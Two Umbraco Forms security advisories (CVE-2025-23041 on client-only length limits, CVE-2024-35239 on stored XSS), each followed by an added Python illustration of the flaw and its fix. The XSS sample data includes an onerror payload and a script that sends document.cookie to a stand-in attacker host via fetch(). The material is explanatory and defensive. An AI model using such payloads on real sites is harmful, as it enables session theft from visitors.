
CVE-2025-23041 – Short and Long Answer Fields Are Not Validated Server-Side For Maximum Length in Umbraco.Forms
https://notcve.org/view.php?id=CVE-2025-23041
14 Jan 2025 — Umbraco.Forms is a web form framework distributed through the NuGet ecosystem. Character limits that editors configure for short-answer and long-answer fields are enforced only client-side, not server-side, so a submitter who bypasses the browser (for example by posting the form data directly) can store answers longer than the configured limit. This issue has been patched in versions 8.13.16, 10.5.7, 13.2.2, and 14.1.2. Users are advised to upgrade. There are no known workarounds for this issue. • https://github.com/umbraco/Umbraco.Forms.Issues/security/advisories/GHSA-9v8m-qv22-f268 • CWE-20: Improper Input Validation
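The following is an added illustration, not code from Umbraco Forms or from the advisory, of why a client-only length check is no check at all: a form-urlencoded body built without a browser ignores the `maxlength` attribute entirely, and only a handler that re-checks the editor-configured limit on the server rejects it. The field model, handler names and the sample form are hypothetical; the length comparison uses `len()` on the decoded string so the limit counts characters, as an editor would expect, rather than UTF-8 bytes.

```python
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import parse_qs, urlencode


# Hypothetical model of a form definition: each answer field may carry a
# maximum character length configured by an editor.
@dataclass(frozen=True)
class AnswerField:
    alias: str
    kind: str                       # "short" or "long" answer
    max_length: Optional[int] = None  # None = no limit configured


@dataclass
class Submission:
    values: dict
    errors: dict = field(default_factory=dict)

    @property
    def accepted(self) -> bool:
        return not self.errors


# Constructed sample form.
FORM = [
    AnswerField("name", "short", max_length=50),
    AnswerField("message", "long", max_length=500),
    AnswerField("note", "long"),
]


def parse_body(raw_body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body (last value wins)."""
    return {k: v[-1] for k, v in parse_qs(raw_body, keep_blank_values=True).items()}


def handle_client_trusting(form, raw_body: str) -> Submission:
    """Pre-patch behaviour: the server assumes the browser enforced maxlength
    and stores whatever arrives."""
    return Submission(values=parse_body(raw_body))


def handle_server_validated(form, raw_body: str) -> Submission:
    """Patched behaviour: the configured limit is re-checked on the server."""
    values = parse_body(raw_body)
    submission = Submission(values=values)
    for f in form:
        if f.max_length is None:
            continue
        value = values.get(f.alias, "")
        # Compare characters, not bytes: 'é' is one character but two bytes.
        if len(value) > f.max_length:
            submission.errors[f.alias] = (
                f"{f.kind} answer exceeds maximum length of {f.max_length}"
            )
    return submission


# Constructed request bodies. ATTACK_BODY is what a direct POST (curl, a
# script, an intercepting proxy) can send regardless of any maxlength
# attribute in the rendered HTML.
ATTACK_BODY = urlencode({"name": "A" * 51, "message": "hello"})
OK_BODY = urlencode({"name": "Alice", "message": "hello"})
# 500 characters, 1000 UTF-8 bytes: within the editor's character limit.
UNICODE_BODY = urlencode({"name": "Alice", "message": "é" * 500})


if __name__ == "__main__":
    print("client-trusting accepts oversized:", handle_client_trusting(FORM, ATTACK_BODY).accepted)
    print("server-validated accepts oversized:", handle_server_validated(FORM, ATTACK_BODY).accepted)
    print("errors:", handle_server_validated(FORM, ATTACK_BODY).errors)
```

The practical check after upgrading is the same as the attack: replay a submission with an over-limit value from outside the browser and confirm the server returns a validation error rather than a stored entry.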

CVE-2024-35239 – Stored Cross-site Scripting on Components of Umbraco Forms
https://notcve.org/view.php?id=CVE-2024-35239
28 May 2024 — Umbraco Forms is an open source .NET web forms solution. In affected versions, an authenticated user with access to edit Forms may inject unsafe HTML into Forms components, which is then rendered for every visitor of the form (stored cross-site scripting). Mitigate by upgrading to one of the patched versions (13.0.1, 12.2.2, 10.5.3, 8.13.13) and then configuring the TitleAndDescription:AllowUnsafeHtmlRendering setting so that unsafe HTML is not rendered. • https://docs.umbraco.com/umbraco-forms/developer/configuration#editing-configuration-values • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
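An added example, not code from Umbraco Forms, showing the two halves of this issue in miniature: the rendering toggle that the `AllowUnsafeHtmlRendering` setting controls (emit stored title and description text as-is, or HTML-escape it), and an audit over already-stored component text, since a payload saved before the upgrade is still in the database afterwards. The component class, the stored sample rows and the function names are hypothetical; where the setting lives in the configuration file is described on the linked Umbraco Forms documentation page.

```python
import html
import re
from dataclasses import dataclass


# Hypothetical model of the "Title and description" component as stored
# in a form definition.
@dataclass(frozen=True)
class TitleAndDescription:
    form_name: str
    title: str
    description: str


# Constructed rows: the first is benign, the second is what a user with
# Forms edit access could have saved in an affected version.
STORED = [
    TitleAndDescription("contact", "Contact us", "We reply within two days."),
    TitleAndDescription(
        "contact",
        "Feedback <img src=x onerror=alert(document.cookie)>",
        "<script>fetch('https://attacker.invalid/?c='+document.cookie)</script>",
    ),
]


def render(component: TitleAndDescription, allow_unsafe_html_rendering: bool) -> str:
    """Render the component as the front end would.

    allow_unsafe_html_rendering=True reproduces the vulnerable behaviour:
    editor-supplied text goes into the page verbatim. With False both
    strings are HTML-escaped (including quotes) before being emitted.
    """
    if allow_unsafe_html_rendering:
        title, description = component.title, component.description
    else:
        title = html.escape(component.title, quote=True)
        description = html.escape(component.description, quote=True)
    return f"<h3>{title}</h3><p>{description}</p>"


# Anything that looks like the start of an HTML tag or comment.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z!]")


def audit(components) -> list:
    """Return (form_name, field) pairs whose stored text contains markup,
    so existing forms can be reviewed after upgrading."""
    findings = []
    for c in components:
        for field_name, text in (("title", c.title), ("description", c.description)):
            if TAG_RE.search(text):
                findings.append((c.form_name, field_name))
    return findings


if __name__ == "__main__":
    print("unsafe :", render(STORED[1], allow_unsafe_html_rendering=True))
    print("escaped:", render(STORED[1], allow_unsafe_html_rendering=False))
    print("audit  :", audit(STORED))
```

Escaping on output is the right default because the text is plain editor copy; if a site genuinely needs markup in these fields, the safer route is a sanitizer with an explicit tag allow-list rather than re-enabling unsafe rendering.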